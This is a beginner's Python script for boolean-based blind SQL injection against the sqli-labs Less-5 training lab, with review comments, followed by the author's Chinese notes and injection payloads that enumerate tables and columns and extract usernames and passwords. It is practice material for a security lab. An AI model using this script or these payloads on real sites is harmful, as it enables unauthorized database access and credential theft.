# Boolean-based blind probe script written against the sqli-labs Less-5
# exercise (the hard-coded localhost URL in __main__). Each probe appends a
# crafted condition to the `id` query parameter and treats the presence of a
# fixed marker string in the response body as "condition true". Every probe
# is one HTTP GET; consecutive requests differ only in a single integer or
# character inside the query string, which is the traffic shape a server-side
# log review or WAF rule would key on.
import requests
import os  # NOTE(review): imported but never used in this file.


# Step 1: find the length of the current database name, then call content()
# to recover the name itself.
def length(url, str):
    # NOTE(review): the parameter named `str` shadows the builtin for the whole
    # body; it holds the marker text that signals a "true" probe.
    num = 1
    # NOTE(review): unbounded loop - if no response ever contains the marker
    # (server unreachable, marker text changed, request blocked), this never
    # returns and keeps issuing requests.
    while True:
        str_num = '%d' %num
        # Probe is true only when length(database()) == num.
        len_url = url + "' and (select length(database()) = " + str_num +")--+"
        response = requests.get(len_url)
        if str in response.text:
            print("數據庫長度為:%s" %str_num)  # "database length is: %s"
            content(url,str,num)
            break
        else:
            num = num + 1


# Step 2: recover the database name one character at a time for positions
# 1..num, appending each matched character to cache.txt via fwrite().
def content(url,str,num):
    # Candidate alphabet: digits and lowercase ASCII letters only. A name
    # containing any other character (uppercase, '_', '-', ...) can never be
    # matched here, which the author's note below also points out.
    s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
    con_num = 1
    while con_num <= num:
        str_num = '%d' %con_num
        for i in s:
            # Probe is true only when the character at position con_num is i.
            con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+"
            response = requests.get(con_url)
            if str in response.text:
                fwrite(i)
        # NOTE(review): the original source is a single unindented line, so it
        # is not certain whether this increment sat inside the `if` above or
        # here after the inner loop; placed here, each position is tried once
        # and the loop terminates even when no candidate matches.
        con_num = con_num + 1


# Appends one recovered character to cache.txt in the current working
# directory (nothing is printed despite the original comment saying so).
def fwrite(i):
    # NOTE(review): not a context manager - the handle is not closed if
    # write() raises.
    fp = open("cache.txt",'a')
    fp.write(i)
    fp.close()


if __name__ == '__main__':
    # Target is the sqli-labs Less-5 page served on localhost.
    url = "http://localhost/sqli-labs/Less-5/?id=1"
    response = requests.get(url)
    # Marker text the page prints for a successful query; it is reused as the
    # true/false oracle by every probe above.
    str = "You are in..........."
    if str in response.text:
        length(url,str)
    else:
        print("請輸入正確的地址")  # "please enter a correct address"
初學python,只注重實現功能,不要太在意某些細節,如有建議,感謝提出。
#庫中有幾個表:
1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+
#測表名長度:
1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+
#爆表名:
1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+
#表中有幾列:
1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+
#測列名長度:
1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+
#爆列名:
1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+
#爆用戶名:
1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+
#爆密碼:
1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+
以上標紅的就是需要遞歸測試的地方(標紅的地方不顯示-.-!,將就看),需要者可自行修改代碼。還有上述代碼中 s 列表請針對具體的情況修改,因為沒有特殊字符以及大寫字母等。